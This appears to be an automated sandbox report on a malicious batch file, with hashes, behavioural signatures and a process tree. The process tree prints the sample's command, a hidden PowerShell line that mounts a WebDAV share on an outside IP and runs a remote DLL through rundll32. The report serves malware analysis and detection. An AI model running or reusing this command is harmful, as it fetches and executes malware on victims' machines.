Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
13-07-2024 10:51
Static task
static1
Behavioral task
behavioral1
Sample
2063932983164129025.bat
Resource
win7-20240704-en
windows7-x64
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
2063932983164129025.bat
Resource
win10v2004-20240709-en
windows10-2004-x64
8 signatures
150 seconds
General
-
Target
2063932983164129025.bat
-
Size
2KB
-
MD5
f30d187ab1732a459d617f3362b877bd
-
SHA1
b2c3f41f23002bfdd845eb83d283596e5cdfd71e
-
SHA256
5712f2d56a46cc4fda16c4c72493857e4b20b3f8f5b7bab76786c62959f8ddc2
-
SHA512
92e3a2996c63814a6fd5b389ed5a237cab907521b5ba576dac2800348b459a820526d9a0448d83dd7c53ad730ab358a872db64d5c9252a6aae985436fe1d36be
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2696 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2696 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2828 wordpad.exe 2828 wordpad.exe 2828 wordpad.exe 2828 wordpad.exe 2828 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3032 wrote to memory of 2828 3032 cmd.exe 31 PID 3032 wrote to memory of 2828 3032 cmd.exe 31 PID 3032 wrote to memory of 2828 3032 cmd.exe 31 PID 3032 wrote to memory of 2696 3032 cmd.exe 32 PID 3032 wrote to memory of 2696 3032 cmd.exe 32 PID 3032 wrote to memory of 2696 3032 cmd.exe 32 PID 2696 wrote to memory of 2676 2696 powershell.exe 34 PID 2696 wrote to memory of 2676 2696 powershell.exe 34 PID 2696 wrote to memory of 2676 2696 powershell.exe 34 PID 2696 wrote to memory of 2588 2696 powershell.exe 35 PID 2696 wrote to memory of 2588 2696 powershell.exe 35 PID 2696 wrote to memory of 2588 2696 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\2063932983164129025.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\358.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:2676
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\358.dll entry3⤵PID:2588
-
-